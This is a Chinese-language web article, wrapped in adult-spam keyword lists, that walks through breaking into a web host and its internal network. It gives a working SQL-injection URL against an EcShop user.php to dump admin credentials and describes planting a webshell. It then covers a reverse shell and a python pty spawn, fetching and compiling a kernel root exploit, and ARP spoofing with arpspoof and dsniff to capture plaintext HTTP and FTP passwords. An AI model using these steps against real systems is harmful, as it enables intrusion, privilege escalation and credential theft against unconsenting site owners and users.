日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

嘗試分析 linux 下滲透嗅探術

瀏覽:209日期:2023-07-15 08:05:59

內網滲透在攻擊層面,其實更趨向于社工和常規漏洞檢測的結合,為了了解網內防護措施的設置是通過一步步的刺探和經驗積累,有時判斷出錯,也能進入誤區。但是如果能在網內進行嗅探,則能事半功倍,處于一個對網內設置完全透明的狀態。本文將從一個注點引發的突破,到控制整個內網的全過程來跟大家討論,內網的滲透嗅探術和安全防護一些內容。

在尋找突破時,更多的是從應用服務來,而應用服務最直觀的信息采集,就是端口掃描,不同的應用,開放的服務不一樣。所以,在對網絡進行信息收集時,大概分為這樣兩步:

端口探測,程序指紋分析。在端口探測方面,個人喜歡用SuperScan來快速對網段里的應用進行判斷

在掌握端口信息后,就要對服務應用程序的指紋進行分析,主要包括版本號、已知的漏洞信息、常規配置信息、針對此應用流行的攻擊方法等。本文試著對網內一臺提供WEB服務的主機作為突破口,提交一個畸形的請求。

從上圖可以讀取以下信息:

系統類型:Fedora

應用程序:apache/2.2.4

以上只是很簡單的手工對程序指紋進行分析,當然在針對web應用的掃描器,還有很多,比較常用的wvs、appscan等。用輕量級的“wwwwscan來掃描:

由掃描的結果可以看到,與手工探測的結果是一致的。

通上面簡單的信息收集后,可以了解到網站架構是apache+mysql+php,直接請求URL:http://61.67.xx.116/htdocs/

發現此站是EcShop架構的站點,其使用的版本信息是V2.5.0。EcShop的版本是存在許多的注入點的。其中user.php文件有個注入漏洞,直接請求URL如下:

http://61.67.xx.116/htdocs/user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0×7c,password,0×7c,email),8 from ecs_admin_user/*

獲取管理員帳號和密碼,ECShop使用的是MD5加密,直接解密。原來密碼是admin,有點意料之外。訪問管理后臺,修改模版處,插入一句木馬,即可得到WEBSEHLL

在獲取WEBshell權限后,就需要對系統進行分析,查找Exp了。執行命令如下:

#uname –a

返回的信息是“Linux fedora 2.6.20-1.2962.fc6 “,Linux內核是2.6.20的。

在提權時,要用到gcc進行編譯,刺探一下系統有沒有安裝,執行命令,

#gcc –help

發現可以運行gcc,并且系統管理員沒對使用shell和gcc進行限制,在也是個安全缺失。

在尋找本地提權利用程序時,通常是根據系統版本來進行,應用程序的本地提權也是一樣的。在網上就有可供查詢的網站,比如http://www.milw0rm.com/網站

發現可利用的漏洞還真不少。

本地提權是需要個交互式的shell的。在本機監聽端口如下:

利用WebShell自帶的反彈功能直接連接本地的12345端口并返回shell

連接成功后,就能得到一個apache用戶的shell

,但有時如果不能交互時,可以直接執行,

# python –c ‘impotr pty;pty.spawn(/bin/sh);’

來得到交互的Shell,一般的系統都默認安裝python

提示成功了,可以新建個目錄用來存放提權的工具。

在Linux提權大致可分為,第三方軟件漏洞、本地信任特性、內核溢出等,比較常用的溢出率高的,當屬內核了。用Wget下載溢出源碼,用到的漏洞是Linux vmsplice Local Root Exploit,成功率蠻高的,gcc編譯,執行。

成功獲取root權限,在選擇溢出利用程序時,有時需要進行多次測試。

什么是Sniffer,sniffer是利用截獲目的的計算機通信,通過分析截獲的數據,提取敏感信息的工具。但其通過什么方法來截獲數據呢?在此之前得解釋一下arp(Address Rrsolution Protocol)協議,即地址解析協議,它位于TCP/IP協議棧中的低層協議,負責將某個IP地址解析成對應的MAC地址。它靠維持在內存中保存的一張表來使IP得以在網絡上被目標機器應答。在數據傳送時,IP包里就有源IP地址、源MAC地址、目標IP地址,如果在ARP表中有相對應的MAC地點,那么根據最優選擇法,直接訪問,如果,沒有對應的地址,就要廣播出去,在網內尋找對應的地址,如果對方的IP地址和發出的目標IP地址相同,那么對方會發送MAC地址給源主機,,而此時,如果攻擊者也接聽到發送的IP地址,它就會仿冒目標主機的IP地址,然后返回自己的主機的MAC地址給源主機,因為源主機發送的IP包沒有包括目標主機的MAC地址,而ARP表里面又沒有目標IP和目標MAC地址的對應表,就會接受攻擊者的MAC而選擇與其通信,所以就此產生了ARP欺騙。在系統剛啟動時,可以在DOS下輸入命令“arp -a來查看本機arp緩存表的內容。

我們來與IP192.168.0.5進行通信,通信后arp緩存表就會有這樣一條MAC地址和IP對應的記錄。

在本機多了條緩存中的IP和MAC的對應紀錄。

Dsniff是一個著名的網絡嗅探工具包,其開發者是Dug Song,其開發的本意是用來揭示網絡通信的不安全性,方便網絡管理員對自己網絡的審計,當然也包括滲透測試,其安裝包里某此工具,充分揭示了協議的不安全性。作為一個工具集,Dsniff包括的工具大致分為四類:

一、

純粹被動地進行網絡活動監視的工具,包括:dsniff、filesnarf、mailsnaf、msgsnarf、urlsnarf、webspy

二、

針對SSH和SSL的MITM攻擊“工具,包括sshmitm和webmitm

三、

發起主動欺騙的工具,包括:arpspoof、dnsspof、macof

四、

其它工具,包括tcpkill、tcpnice

Dsniff的官方下載:www.monkey.org/~dugsong/dsniff/ 這個是源碼包,解壓后可以看下README,提示需要五個軟件的支持:openssl、Berkeley_db、libnet、libpca、libnids

下載地址如下:

Berkeley_db: http://www.oracle.com/technology/software/products/berkeley-db/index.html

libpcap: http://www.tcpdump.org/release/libpcap-1.0.0.tar.gz

linux/epel/5/i386/dsniff-2.4-0.3.b1.el5.i386.rpm">ftp://rpmfind.net/linux/epel/5/i386/dsniff-2.4-0.3.b1.el5.i386.rpm

ftp://rpmfind.net/linux/epel/5/i386/libnet-1.1.4-1.el5.i386.rpm

ftp://rpmfind.net/linux/epel/5/i386/libnids-1.23-1.el5.i386.rpm

系統一般默認都有安裝openssl、libpcap。

一、 Tar包安裝

如果下載的是源包,文件如下:openssl-0.9.7i.tar.gz、libnids-1.18.tar.gz、libpcap-0.7.2.tar.gz、libnet-1.0.2a.tar.gz、Berkeley db-4.7.25.tar.gz

a) 安裝openssl

用tar解壓軟件包手,執行三條命令

#./config

#make

#make install

b) 安裝libpcap

#./config

#make

#make install

c) 安裝libnet

#./config

#make

#make install

d) 安裝libnids

#./config

#make

#make install

e) 安裝libnids

#./config

#make

#make install

f) 安裝Berkeley DB

#.cd build_unix

#../dist/configure

#make

#make install

g) 安裝dsniff

#./configure

#make

#make install

程序安裝好后,先查看一下網卡信息,然后開啟服務器IP轉發,命令如下:

# echo “1″ > /proc/sys/net/ipv4/ip_forward

先來雙向欺騙,用到arpspoof,其命令是:

#arp –t 網關

欺騙主機IP

arpspoof已經開始工作了,可以用tcpdump查看一下被攻擊主機是否有數據經過

命令如下:

#tcpdump –I eth0 host 61.67.x.115

有數據交換,說明欺騙的比較成功,然后用Dsniff開始嗅探目標主機,命令如下。

#Dsniff –c –f /etc/dsniff/dsniff.services

這個dsniff.services自然就是保存端口和服務對應關系的文件,如需要保存到文件,需加-w filename數據全是明文傳送的。所以數據分析完全能用肉眼發現。

從這條數據可以看到HTTP登錄和FTP登錄信息,帳號和密碼全是明文的。而經過測試,通過FTP上傳的目錄正是WEB目錄,獲取WEBShell權限,繼續提權即可控制主機。Linux下的嗅探,其實更容易一些,在最近爆出的高危本地提權,不知道有多少臺主機淪陷呢?在攻與防的游戲里,系統管理員往往顯得如此的無助。

標簽: Linux系統
相關文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
日本黄色精品| 国产精品人人爽人人做我的可爱| 日韩va欧美va亚洲va久久| 久久亚洲图片| 亚洲精品精选| 日韩成人午夜精品| 国产日韩欧美在线播放不卡| 国产精品九九| 高清日韩中文字幕| 欧美成人a交片免费看| 久久天堂av| 蜜臀久久精品| 亚洲高清成人| 在线精品观看| 国产精品最新| 动漫av一区| 久久国产中文字幕| 另类激情亚洲| 91成人精品观看| 久久久亚洲欧洲日产| 91免费精品| 午夜久久久久| 涩涩涩久久久成人精品| 国产精品一区二区三区美女| 欧美激情福利| se01亚洲视频 | 久久字幕精品一区| 激情视频网站在线播放色| 久久婷婷丁香| 先锋影音国产一区| 国产三级精品三级在线观看国产| 精品久久亚洲| 午夜欧美视频| 久久国产乱子精品免费女| 国产 日韩 欧美 综合 一区| 九九精品调教| 美女日韩在线中文字幕| 国产日韩免费| 久久久久国产| 日韩有吗在线观看| 电影91久久久| 国产婷婷精品| 国产欧美日韩免费观看| 日本精品不卡| 亚洲精品国产日韩| 日本一区二区高清不卡| 狠狠干综合网| 欧美91在线|欧美| 少妇精品导航| 日韩中文字幕视频网| 成人国产精品久久| 亚洲免费影视| 精品国产亚洲一区二区在线观看| 亚洲国产一区二区在线观看| 久久精品99久久久| 欧美特黄一级大片| 欧美日本不卡| 欧美日韩精品免费观看视频完整| 国产欧美在线| 欧美女激情福利| 久久精品国产精品亚洲毛片| 午夜精品婷婷| 久久亚洲黄色| 在线观看一区| 性欧美videohd高精| 青草av.久久免费一区| 在线手机中文字幕| 亚洲精品三级| 精品丝袜在线| 国产精品一页| 免费在线欧美视频| 免费看av不卡| 国产精品久久久久毛片大屁完整版| 欧美成人精品| 久久精品三级| 色综合视频一区二区三区日韩 | 亚洲精品国产精品粉嫩| 亚洲免费福利| 国产精品麻豆成人av电影艾秋| 亚洲女同一区| 最近高清中文在线字幕在线观看1| 日韩精品一区二区三区免费视频 | 久久99伊人| 日韩在线中文| 国产精品国码视频| 亚洲精品一级| 激情婷婷欧美| 国产拍在线视频| 国产激情一区| 日韩中文一区二区| 国产精品日本| 欧美不卡在线| 欧美精品高清| 国语对白精品一区二区| 国产视频一区二| 亚久久调教视频| 视频一区欧美精品| 激情欧美一区| 日韩av首页| 国产理论在线| 国产一区调教| 欧美激情aⅴ一区二区三区 | 欧美男人天堂| 精品国产中文字幕第一页| 国产乱码午夜在线视频| 麻豆视频久久| 国产精品手机在线播放| 日本欧美一区二区| 蜜桃视频一区二区| 日韩午夜av在线| 奇米亚洲欧美| 日本va欧美va精品发布| 日本一区二区中文字幕| 亚洲丝袜美腿一区| 美女被久久久| 国产精品日韩久久久| 国产精品88久久久久久| 亚洲四虎影院| 国产一区二区三区自拍| 欧美二区视频| 欧美午夜不卡| 日韩午夜免费| 国产亚洲精品v| 9久re热视频在线精品| 欧美日韩高清| 999久久久国产精品| 亚洲成人va| 精品欧美久久| 热久久国产精品| 日韩一区二区三区精品| 日韩国产在线一| 久久国产人妖系列| 国产精品66| 色综合狠狠操| 日韩精品免费一区二区三区| 欧美成人基地| 婷婷色综合网| 蜜桃视频一区二区| 人人精品久久| 你懂的国产精品永久在线| 麻豆成人91精品二区三区| 久久精品免视看国产成人| 欧美少妇精品| 欧美日韩精品一本二本三本| 视频在线观看国产精品| 日韩国产在线一| 久久99久久久精品欧美| 国产精品毛片久久| 久久婷婷一区| 亚洲欧美日韩精品一区二区| 亚洲综合激情在线| 国产精品tv| 美女福利一区二区三区| 欧美另类综合| 日本亚州欧洲精品不卡| 欧美有码在线| 国产一区二区三区成人欧美日韩在线观看| 91日韩免费| 亚洲综合欧美| 国产精品亚洲欧美| 成人免费网站www网站高清| 亚洲一区欧美二区| 国产欧美视频在线| 日韩欧美一区二区三区在线视频 | 欧美一区二区三区免费看| 国产经典一区| 久久91导航| 免费美女久久99| 国产精品久久久久77777丨| 日韩欧美综合| 亚洲一二av| 日本精品黄色| 热久久久久久久| 国产第一亚洲| 视频精品一区二区| 精品视频91| 老牛国产精品一区的观看方式| 国产精品调教| 在线亚洲精品| 精品视频黄色| 99综合视频| 欧美国产日韩电影| 亚洲香蕉网站| 国产精品久久亚洲不卡| 欧美日韩高清| 国产激情久久| 亚洲在线一区| 高清av一区| 亚洲狼人精品一区二区三区| 红杏一区二区三区| 综合国产精品| 日韩精品1区| 日韩精品欧美成人高清一区二区| 久久久久久色| 国内激情久久| 欧美日韩国产一区二区在线观看| 日韩综合精品| 国产欧美91| 三级亚洲高清视频| 在线观看精品|